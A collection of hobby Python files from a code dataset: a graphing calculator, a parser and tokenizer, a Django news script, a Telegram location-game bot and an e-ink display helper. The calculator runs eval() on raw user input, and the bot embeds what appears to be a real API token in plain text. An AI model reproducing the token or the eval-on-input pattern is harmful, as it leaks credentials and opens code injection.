xlistpts[corgofor]*ylistpts[corgofor]\n        Exylist.append(jum)\n        Ex2ylist.append((xlistpts[corgofor]**2)*ylistpts[corgofor])\n        corgofor += 1\n    Exy = sum(Exylist)\n    # bug fix: Ex2y must be the sum of x^2*y, not Ex2+Ey\n    Ex2y = sum(Ex2ylist)\n    Exx = (Ex2)-(((Ex)**2)/N)\n    Exy = (Exy) - ((Ex*Ey)/N)\n    Exx2 = (Ex3) - ((Ex2*Ex)/N)\n    Ex2y = (Ex2y) - ((Ex2*Ey)/N)\n    Ex2x2 = (Ex4) - (((Ex2)**2)/N)\n    a = ((Ex2y*Exx)-(Exy*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n    b = ((Exy*Ex2x2)-(Ex2y*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n    c = (Ey/N)-(b*(Ex/N))-(a*(Ex2/N))\n    returnlist = [a,b,c]\n    return(returnlist)\n\ncoords = None\nesetreg = TextAsset(\"Congratulations! 
you win 1 million dollars!\", style = '40pt Arial')\nred = Color(0xff0000, 1.0)\ngreen = Color(0x00ff00, 1.0)\nblue = Color(0x0000ff, 1.0)\nblack = Color(0x000000, 1.0)\npurple = Color(0x9B30FF, 1.0)\ngrey = Color(0xd3d3d3, 0.7)\nthinline = LineStyle(0, black)\nyaxis = RectangleAsset(1, 1000, thinline, black)\nxaxis = RectangleAsset(1900, 1, thinline, black)\nycursor = RectangleAsset(1, 1000, thinline, grey)\nxcursor = RectangleAsset(1900, 1, thinline, grey)\nclass Xcursorclass(Sprite):\n def __init__(self, position):\n super().__init__(xcursor, position)\nclass Ycursorclass(Sprite):\n def __init__(self, position):\n super().__init__(ycursor, position)\nxcurse = Xcursorclass((0,0))\nycurse = Ycursorclass((0,0))\nxaxisrulings = RectangleAsset(1, 7, thinline, black)\nyaxisrulings = RectangleAsset(7, 1, thinline, black)\nthinline = LineStyle(0, black)\ncircle = CircleAsset(3, thinline, blue)\ncirclebig = CircleAsset(6, thinline, red)\nSprite (xaxis, (0, 500))\nSprite (yaxis, (950, 0))\nsmiley = ImageAsset(\"smileyface.jpg\")\nyaxisrulingsprites = [Sprite(yaxisrulings, (947.5, y*20)) for y in range(-100, 100, 1)]\nxaxisrulingsprites = [Sprite(xaxisrulings, (x*20+10, 497)) for x in range(-150, 150, 1)]\n\nxcoordinates2 = range(-1500, 1500, 1)\nxcoordinates = []\nfor x in xcoordinates2:\n x = x/32\n xcoordinates.append(x)\n\npointpos = 1\nlinetypelist = input(\"choose function, plot (f,p). Separate by commas: \")\nlinetypelist = linetypelist.split(\",\")\nfor linetype in linetypelist:\n if linetype == \"f\":\n function = input(\"y=\")\n for x in xcoordinates:\n yval = (-20*(eval(function))+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if linetype == \"p\":\n again = True\n ylistpts=[]\n xlistpts=[]\n while again == True:\n point = input(\"input point x,y. press q to quit, qr or lr to regress: \")\n if point == \"q\" or point == \"qr\" or point == \"lr\":\n again = False\n if again == True:\n point = point.split(\",\")\n xlistpts.append(float(point[0]))\n ylistpts.append(float(point[1]))\n if point == \"lr\":\n xlistmean = (sum(xlistpts))/len(xlistpts)\n ylistmean = (sum(ylistpts))/len(ylistpts)\n xmeanlist = []\n ymeanlist = []\n for i in xlistpts:\n x = i-xlistmean\n x = x**2\n xmeanlist.append(x)\n for i in ylistpts:\n y = i-ylistmean\n y = y**2\n ymeanlist.append(y)\n sdx = (sum(xmeanlist)/len(xmeanlist))**0.5\n sdy = (sum(ymeanlist)/len(ymeanlist))**0.5\n rval = correlation(xlistpts, ylistpts)\n regreslope = rval*(sdy/sdx)\n regreintercept = ylistmean - (regreslope*xlistmean)\n regreinterceptprint = str(round(10*regreintercept)/10)\n oper = \"+\"+regreinterceptprint\n if regreintercept < 0:\n oper = \"-\"+regreinterceptprint\n if regreintercept == 0:\n oper = \"\"\n print (\"Regression: y=\"+str((round(10*regreslope))/10)+\"x\"+ oper +\". 
r = \" + str(round(10000*rval)/10000))\n for x in xcoordinates:\n yval = (-20*(regreslope*x+regreintercept)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if point == \"qr\":\n abc = quadreg(xlistpts,ylistpts)\n quada = abc[0]\n quadb = abc[1]\n quadc = abc[2]\n for x in xcoordinates:\n yval = (-20*(quada*(x**2)+quadb*x+quadc)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n goforh = 0\n while goforh <= len(xlistpts)-1:\n Sprite(circlebig, (20*float(xlistpts[goforh])+950, -20*float(ylistpts[goforh])+500))\n goforh += 1\n goforlist = 1\n while goforlist <= len(xlistpts)-1:\n pointz = TextAsset(\"(\"+str(xlistpts[goforlist-1])+\",\"+str(ylistpts[goforlist-1])+\"), (\"+str(xlistpts[goforlist])+\",\"+str(ylistpts[goforlist])+\")\", style = '8pt Arial')\n goforlist+=2\n Sprite (pointz, (10, pointpos*15))\n pointpos+=1\n if linetype in ['a', 'b', 'c', 'd', 'e', 's', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'q', 'r', 't', 'u', 'v', 'w', 'x', 'y', 'z']:\n Sprite (esetreg, (200, 200))\ndef mousePosition(event):\n global text\n global coords\n if coords != None:\n coords.destroy()\n xcurse.y = event.y-7\n ycurse.x = event.x-9\n text = TextAsset(\"(\" + str(round((event.x-959)/20)) + \",\" + str(round((-(event.y-507))/20)) + \")\", style = '10pt Arial')\n coords = Sprite(text, (event.x-7, event.y-22))\ndef mouseclick(event):\n Sprite (smiley, (100, 100))\n \n\nmyapp = App(SCREEN_WIDTH, SCREEN_HEIGHT)\nmyapp.run()\nmyapp.listenMouseEvent('mousemove', mousePosition)\nmyapp.listenMouseEvent('mouseclick', mouseclick)\n","sub_path":"Graphingcalc.py","file_name":"Graphingcalc.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52991472","text":"#!/usr/bin/env python\n\nimport qm\nimport pylab\nfrom pylab import arange,pi,sin,cos,sqrt\nimport random\n\n# set up the plotting code to use latex\nparams = { 'text.usetex': True }\npylab.rcParams.update(params)\n\n# data parameters\npi = qm.QM_PI\nN = 262144\nsf = 4096.0\ndt = 1.0 / sf\nf_min = 40.0\nconv = 0\n\n# noise generation seed\nseed = 78\n\n# generate an Initial LIGO power spectrum\npsd = qm.new_ligo_psd(N,dt)\n\n# template 1 parameters\nm1_1 = random.uniform(6,14)\nsup_1 = min(3,15-m1_1)\nm2_1 = random.uniform(1,sup_1)\nchi_1 = random.uniform(0.01,0.99)\nkappa_1 = random.uniform(-0.99,0.99)\n\n# template 2 parameters\nm1_2 = random.uniform(6,14)\nsup_2 = min(3,15-m1_1)\nm2_2 = random.uniform(1,sup_1)\nchi_2 = random.uniform(0.01,0.99)\nkappa_2 = random.uniform(-0.99,0.99)\n\ndistance = qm.calculate_ptf_kludge_distance( m1_1, m2_1, chi_1, kappa_1, m1_2, m2_2,\nchi_2, kappa_2, psd, f_min )\n\nprint(\"template #1 parameters: (m1_1, m2_1, chi_1, kappa_1) = (%f %f %f %f)\\n\" % (m1_1,\nm2_1, chi_1, kappa_1))\nprint(\"template #2 parameters: (m1_2, m2_2, chi_2, kappa_2) = (%f %f %f %f)\\n\" % (m1_2,\nm2_2, chi_2, kappa_2))\nprint (\"distance = %f\\n\" % distance)\n","sub_path":"test/ptf_kludge_distance_test.py","file_name":"ptf_kludge_distance_test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"495917801","text":"# general imports\nimport re\n\n# tokenizer imports\nfrom S_parser.Tokenizer.Stup_Option import Option\nfrom S_parser.Tokenizer.Stup_Selector import Selector\nfrom S_parser.Tokenizer.Token import Token\n# imports for the ast\nfrom S_parser.Tree.Stup_Token_Selector import TokenSelector\n\n# 
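# --- editor's sketch, not part of the original Stupid_parser.py ------------
# The Option list below drives a first-match tokenizer. Reduced to the
# standard library (a hypothetical mini version, not the project's Selector
# class), the core loop is:
import re

def tiny_tokenize(text, rules):
    # rules: ordered list of (name, compiled_pattern); the first match wins.
    # Every pattern must consume at least one character, or this loops.
    pos = 0
    while pos < len(text):
        for name, pattern in rules:
            m = pattern.match(text, pos)
            if m:
                yield name, m.group(0)
                pos = m.end()
                break
        else:
            raise SyntaxError('no rule matches at %r' % text[pos:pos + 10])

# usage: list(tiny_tokenize('[a]', [('LBrace', re.compile(r'\[')),
#                                   ('Name', re.compile(r'[a-z]+')),
#                                   ('RBrace', re.compile(r'\]'))]))
# ---------------------------------------------------------------------------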
DEBUG FLAGS\nDebugShowTokens = True\n\n# MainOptions with patterns to match\nMainOptions = []\nMainOptions.append(Option(\"Tag\", r\"\\<([a-zA-Z0-9_]+)\\>\", 1))\nMainOptions.append(Option(\"String\", r'\"(?:[^\"\\\\]|\\\\.)*\"'))\nMainOptions.append(Option(\"Regex\", r\"R/(.+?)\\/R\", 1))\nMainOptions.append(Option(\"Colon\", r\"\\:\"))\nMainOptions.append(Option(\"SemiColon\", r\"\\;\"))\nMainOptions.append(Option(\"LBrace\", r\"\\[\"))\nMainOptions.append(Option(\"RBrace\", r\"\\]\"))\nMainOptions.append(Option(\"Comma\", r\"\\,\"))\nMainOptions.append(Option(\"plus\", r\"\\+\"))\nMainOptions.append(Option(\"star\", r\"\\*\"))\n\n# the whitespaces for debugging (whitespace after newline)\nMainOptions.append(Option(\"NewLine\", r\"\\n\"))\nMainOptions.append(Option(\"Whitespace\", r\"\\s+\"))\n\nclass Parser:\n # give the grammar to the parser.\n # the default entrypoint\n def __init__(self, grammar, entry_point=\"start\"):\n # put the grammar for the parser into a variable\n self.grammar = grammar\n self.grammar_text = grammar\n # keep track of where I am inside the grammar\n self.line = 1\n self.index = 0\n print(\"creating the parser!\")\n self.MainSelector = Selector(MainOptions)\n # start building the grammar for my parser\n toks = self.Grammar_to_tokens()\n print(\"build the parser! from text:\")\n print(self.grammar_text)\n self.Meta_Selector = TokenSelector(toks, entry_point)\n\n # get the tokens from the grammar file\n def Grammar_to_tokens(self):\n # get all the tokens from the grammar file\n tokens = []\n for tok in self.get_Tokens():\n if tok[1].name == \"NewLine\":\n self.line += 1\n self.index = 0\n else:\n # update the location after setting the token\n if tok[1].name != \"Whitespace\":\n tok[1].setLocation(self.line, self.index)\n tokens.append(tok)\n # add the length of the token to the index\n self.index += len(tok[0])\n\n # tok[0] is the full matched string.\n # tok[1] is the token that get's made\n self.grammar = self.grammar[len(tok[0]):]\n\n # now that we have the tokens we only keep the token object\n tokens = [tok[1] for tok in tokens]\n if DebugShowTokens:\n # show the tokens\n for tok in tokens:\n print(tok)\n return tokens\n\n # private function that returns the tokens\n def get_Tokens(self):\n canParse = True\n # start parsing the grammar file\n while len(self.grammar) > 0 and canParse:\n canParse = False\n choiceIndex = self.MainSelector.select(self.grammar)\n # verify the index\n if self.MainSelector.verifyIndex(choiceIndex):\n canParse = True\n # get the matched text from the chosen option\n matched_text = self.MainSelector.options[choiceIndex].match(self.grammar)\n yield [matched_text.group(0), Token(self.MainSelector.options[choiceIndex].name, matched_text.group(self.MainSelector.options[choiceIndex].group))]\n else:\n # we will have to break out of this loop and see what text does not parse.\n canParse = False\n if len(self.grammar) > 0:\n # could not parse a piece of text\n print(\"length of text is:'{}'\".format(len(self.grammar)))\n raise SyntaxError(\"The grammar file could not be read correctly. 
error on:'{}'\".format(self.grammar))\n else:\n print(\"grammar tokenized succesfully\")","sub_path":"src/S_parser/Stupid_parser.py","file_name":"Stupid_parser.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243958089","text":"import tulip.value as v\nfrom tulip.symbol import sym\nfrom tulip.lexer import Token\n\ndef parse_skeleton(lexer):\n lexer.setup()\n parsed = _parse_sequence(lexer, None, 0)\n lexer.teardown()\n return parsed\n\nclass ParseError(StandardError):\n def __init__(self, token, message):\n self.token = token\n self.message = message\n\nclass UnexpectedError(ParseError):\n def dump(self):\n return u'unexpected token %s: %s' % (self.token.dump(), self.message)\n\nclass UnmatchedError(ParseError):\n def dump(self):\n return u'unmatched delimiter %s: expected %s' % (self.token.dump(), self.message)\n\ndef unexpected(tok, message):\n raise UnexpectedError(tok, message)\n\ndef unmatched(tok, message):\n raise UnmatchedError(tok, message)\n\ndef _parse_sequence(lexer, open_tok, expected_close_id):\n elements = []\n\n while True:\n tok = lexer.next()\n\n if tok.tokid == Token.EOF:\n if open_tok is None:\n return v.cons_list(elements)\n else:\n unmatched(open_tok, Token.TOKENS[expected_close_id])\n elif open_tok is not None and tok.tokid == expected_close_id:\n return v.tag(u'nested', [v.Token(open_tok), v.Token(tok), v.cons_list(elements)])\n elif tok.tokid in [ Token.RPAREN, Token.RBRACK, Token.RBRACE ]:\n if open_tok is not None:\n unexpected(tok, u'invalid nesting from %s' % open_tok.dump())\n else:\n unexpected(tok, u'invalid nesting from the beginning')\n elif tok.tokid == Token.LPAREN:\n elements.append(_parse_sequence(lexer, tok, Token.RPAREN))\n elif tok.tokid == Token.LBRACK or tok.tokid == Token.MACRO:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACK))\n elif tok.tokid == Token.LBRACE:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACE))\n elif tok.tokid == Token.NL and expected_close_id == Token.RPAREN:\n pass\n elif tok.tokid == Token.NL and lexer.peek().eats_preceding_newline():\n pass\n else:\n elements.append(v.tag(u'token', [v.Token(tok)]))\n\ndef parse_from_string(s):\n from tulip.reader import StringReader\n from tulip.lexer import ReaderLexer\n reader = StringReader(u'(parse_from_string)', s)\n lexer = ReaderLexer(reader)\n return parse_skeleton(lexer)\n","sub_path":"tulip/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"148932074","text":"from newsie.models import ArticleCluster\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\nfrom newsie.publications.get_articles import categories\n\ndef find_top_stories():\n for category in categories(): #Iterate through RSS feed Categories\n\n #Get today's stories\n today = timezone.make_aware(datetime.today())\n last_36_hours = timezone.make_aware(datetime.today() - timedelta(hours=36))\n\n # Find top 5 clusters if size is 2 or greater\n top_stories = ArticleCluster.objects \\\n .filter(most_recent_pub_date__gte=last_36_hours, category__exact=category, size_today__gte=2) \\\n .order_by('-size_today')[:15]\n\n for cluster in top_stories:\n cluster.top_story_on = today\n 
cluster.save()","sub_path":"newsie/scripts/find_top_stories.py","file_name":"find_top_stories.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"286130918","text":"import logging\r\nimport sqlite3\r\n\r\nimport math\r\nfrom telegram import Message, Chat, ReplyKeyboardMarkup, KeyboardButton, Location\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nDISCOVER_RADIUS = 0.1\r\n\r\ndef start(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n\r\n message = \"Something went wrong :(\"\r\n\r\n select_data = (str(update.message.from_user.username),)\r\n db.execute(\"SELECT * FROM users WHERE name=?\", select_data)\r\n user = db.fetchone()\r\n if user:\r\n message = ' '.join(['Welcome back ' + user[0] + '! You have*',\r\n str(user[1]), 'points*.\\nType /help if you need anything.'])\r\n else:\r\n insert_data = (str(update.message.from_user.username), 10, \"\")\r\n db.execute(\"INSERT INTO users (name, points, objdesc) VALUES (?,?,?)\", insert_data)\r\n message = 'Hello ' + insert_data[0] + '!\\nType /help if you need anything!'\r\n\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n db_connection.commit()\r\n\r\n\r\ndef send_help(bot, update):\r\n message = ''.join(['*JHGeoGameBot* hosts a location-based game in which you will try to capture objectives.\\n',\r\n 'To begin playing, type /start and send a location. We will automatically parse it for you and ',\r\n 'give you the distance to the closest objective. Once you\\'re close enough, you will capture ',\r\n 'it and receive *25 points* for your effort.\\n\\n',\r\n 'When you reach *100 points* you will be able to set up your own objective as long as it is ',\r\n 'far enough from any other existing objective. When other users capture your objective, ',\r\n 'you will receive *5 points*.\\n'\r\n ])\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n\r\n\r\ndef get_points(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, id integer) \")\r\n db.execute(\"SELECT points FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n points = db.fetchone()\r\n message = \"\"\r\n db.execute(\"SELECT * FROM locations\")\r\n print(db.fetchall())\r\n if points is not None:\r\n message = ''.join(['You have *' + str(points[0]) + ' points*.\\n',\r\n 'You can use *100 points* to set up your own objective with /addobj'\r\n ])\r\n else:\r\n message = 'It seems you haven\\'t started playing. 
Type /start and join the game!'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n\r\n\r\ndef add_objective(bot, update, args):\r\n if len(args) > 0:\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if user[2]:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You are already adding a new objective. Type /cancel to get your points back.',\r\n reply_to_message_id=update.message.message_id)\r\n elif user[1] >= 100:\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]-100, ' '.join(args), user[0]))\r\n message = ''.join(['I have now subtracted *100 points* from your score. ',\r\n 'The next location you send will be registered as an objective. ',\r\n 'Type /cancel to get your points back.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = ''.join(['You don\\'t have enough points to set up a new objective.',\r\n ' Try again when you have *100 points*.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Usage: /addobj ',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n\r\ndef cancel_objective(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if len(user[2]):\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]+100, \"\", user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'Canceled successfully. You now have *' + str(user[1]+100) + '* points.',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Nothing to cancel.',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n\r\ndef cheat(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n db.execute(\"UPDATE users SET points=? 
WHERE name=?\", (user[1]+100, user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'You HACKED yourself some points.')\r\n db_connection.commit()\r\n\r\n\r\ndef distFromCoords(lon1, lat1, lon2, lat2):\r\n radius = 6371\r\n dlon = abs(lon1-lon2)*math.pi/180\r\n dlat = abs(lat1-lat2)*math.pi/180\r\n a = math.sin(dlat/2)*math.sin(dlat/2)+math.cos(lat1*math.pi/180)*math.cos(lat2*math.pi/180)*math.sin(dlon/2)*math.sin(dlon/2)\r\n b = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n dist = radius*b\r\n return dist\r\n\r\n\r\ndef message_handler(bot, update):\r\n if update.message.text:\r\n keyboard_button = KeyboardButton(text='Send location', request_location=True)\r\n bot.sendMessage(update.message.chat.id,\r\n 'Less talking and more searching!\\nSend me your location to search around!',\r\n reply_to_message_id=update.message.message_id,\r\n reply_markup=ReplyKeyboardMarkup([[keyboard_button]]))\r\n elif update.message.location:\r\n lon = update.message.location['longitude']\r\n lat = update.message.location['latitude']\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS matches (user text, matchid integer)\")\r\n\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n min_dist = 10000\r\n usr = ''\r\n desc = ''\r\n objid = 0\r\n for obj in db.execute(\"SELECT * FROM locations WHERE owner!=? AND locid NOT IN (SELECT matchid FROM matches WHERE user=?)\", (user[0],user[0])):\r\n if obj is not None:\r\n dist = distFromCoords(obj[0], obj[1], lon, lat)\r\n if dist < min_dist:\r\n min_dist = dist\r\n usr = obj[2]\r\n desc = obj[3]\r\n objid = obj[4]\r\n if user[2]:\r\n if min_dist > DISCOVER_RADIUS:\r\n db.execute(\"SELECT COUNT(*) FROM locations\")\r\n size = db.fetchone()[0]\r\n db.execute(\"INSERT INTO locations (lon, lat, owner, objdesc, locid) VALUES (?,?,?,?,?)\",\r\n (lon, lat, update.message.from_user.username, user[2], size))\r\n db.execute(\"UPDATE users SET objdesc='' WHERE name=?\", (user[0],))\r\n bot.sendMessage(update.message.chat.id,\r\n '*New objective successfully registered!*',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You\\'re too close to an already existing objective!',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = 'Something went wrong :('\r\n if 10000 > min_dist >= DISCOVER_RADIUS:\r\n d = (\"%.2f\" % min_dist)\r\n message = 'The closest objective is *' + str(d) + '* km away.'\r\n elif min_dist < DISCOVER_RADIUS:\r\n message = 'Captured the objective \\\"' + desc + '\\\" by @' + usr + '!\\n*+25 POINTS!*'\r\n db.execute(\"UPDATE users SET points = ? WHERE name = ?\", (user[1]+25, user[0]))\r\n db.execute(\"UPDATE users SET points = points+5 WHERE name = ?\", (usr,))\r\n db.execute(\"INSERT INTO matches (user, matchid) VALUES (?,?)\",\r\n (user[0], objid))\r\n else:\r\n message = 'No nearby objectives were found. Your own objectives won\\'t show up'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. 
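distFromCoords above is the haversine formula written out longhand. This is an equivalent, hedged rewrite (haversine_km is an illustrative name) that uses math.radians instead of the repeated *math.pi/180, with a quick sanity check: one degree of latitude is roughly 111.2 km.

import math

def haversine_km(lon1, lat1, lon2, lat2):
    # Great-circle distance in kilometres between two lon/lat points.
    r = 6371  # mean Earth radius in km, same constant as distFromCoords
    dlon = math.radians(lon2 - lon1)
    dlat = math.radians(lat2 - lat1)
    a = (math.sin(dlat / 2) ** 2
         + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2))
         * math.sin(dlon / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(a))

# Sanity check: one degree of latitude is about 111.2 km.
assert abs(haversine_km(0, 0, 0, 1) - 111.19) < 0.5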
Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'That\\'s cool! We don\\'t have any use for it though...',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n updater = Updater(token='262103726:AAGOwtH2gGcZTsbi2BL5OpueK5BbKJ0pFIY')\r\n dispatcher = updater.dispatcher\r\n\r\n dispatcher.add_handler(CommandHandler('start', start))\r\n dispatcher.add_handler(CommandHandler('help', send_help))\r\n dispatcher.add_handler(CommandHandler('points', get_points))\r\n dispatcher.add_handler(CommandHandler('addobj', add_objective, pass_args=True))\r\n dispatcher.add_handler(CommandHandler('cancel', cancel_objective))\r\n\r\n dispatcher.add_handler(CommandHandler('cheat', cheat))\r\n\r\n dispatcher.add_handler(MessageHandler([], message_handler))\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n","sub_path":"Jacobs/JacobsBot.py","file_name":"JacobsBot.py","file_ext":"py","file_size_in_byte":13465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"502579836","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport coreapp.views\nimport coreapp.urls\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ExpensesMonitor.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'coreapp.views.index', name='index'),\n url(r'^login$', 'django.contrib.auth.views.login', name='login'),\n url(r'^register$', 'coreapp.views.register', name='register'),\n url(r'^about$', coreapp.views.about, name='about'),\n url(r'^contact$', coreapp.views.contact, name='contact'),\n url(r'^faq$', coreapp.views.faq, name='faq'),\n\n url(r'^user/', include(coreapp.urls, namespace='user')),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n url(r'^accounts/logout$', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n)\n","sub_path":"ExpensesMonitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"103118076","text":"from PIL import ImageFont\r\nfrom font_fredoka_one import FredokaOne\r\n\r\n\r\ndef draw_text(display, draw, message, font_size=24, y_align=\"middle\"):\r\n \"\"\"Get yfinance ticker object from a symbol\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n message (str): Texr message to display\r\n font_size (int): Font size\r\n y_align (str): Y alignment of message: \"middle\", \"top\" or \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n # Scale down font if the text is bigger than the screen\r\n if w > display.WIDTH:\r\n font_size = int(font_size * display.WIDTH / w)\r\n font = 
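The one-shot rescale in draw_text assumes rendered text width scales linearly with point size, which is only approximately true once hinting and kerning are involved. A hedged iterative variant (fit_font is an illustrative name; font.getsize mirrors the Pillow API already used in this file):

from PIL import ImageFont
from font_fredoka_one import FredokaOne

def fit_font(message, max_width, start_size=24, min_size=8):
    # Shrink the point size one step at a time until the text fits.
    size = start_size
    font = ImageFont.truetype(FredokaOne, size)
    while font.getsize(message)[0] > max_width and size > min_size:
        size -= 1
        font = ImageFont.truetype(FredokaOne, size)
    return font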
ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n x = (display.WIDTH / 2) - (w / 2)\r\n\r\n if y_align == \"middle\":\r\n y = (display.HEIGHT / 2) - (h / 2)\r\n elif y_align == \"top\":\r\n y = 0\r\n elif y_align == \"bottom\":\r\n y = display.HEIGHT - h\r\n else:\r\n raise Exception(\"y_align parameter not recognised\")\r\n\r\n draw.text((x, y), message, display.BLACK, font)\r\n return draw\r\n\r\n\r\ndef draw_simple_messages(\r\n display,\r\n draw,\r\n messages,\r\n font_sizes={\"top\": 24, \"middle\": 52, \"bottom\": 18},\r\n):\r\n \"\"\"Draw three text messages\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n messages (dict): messages with the keys \"middle\", \"top\" and \"bottom\"\r\n font_sizes (dict): Font sizes dict with the keys \"middle\", \"top\" and \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n for location, message in messages.items():\r\n 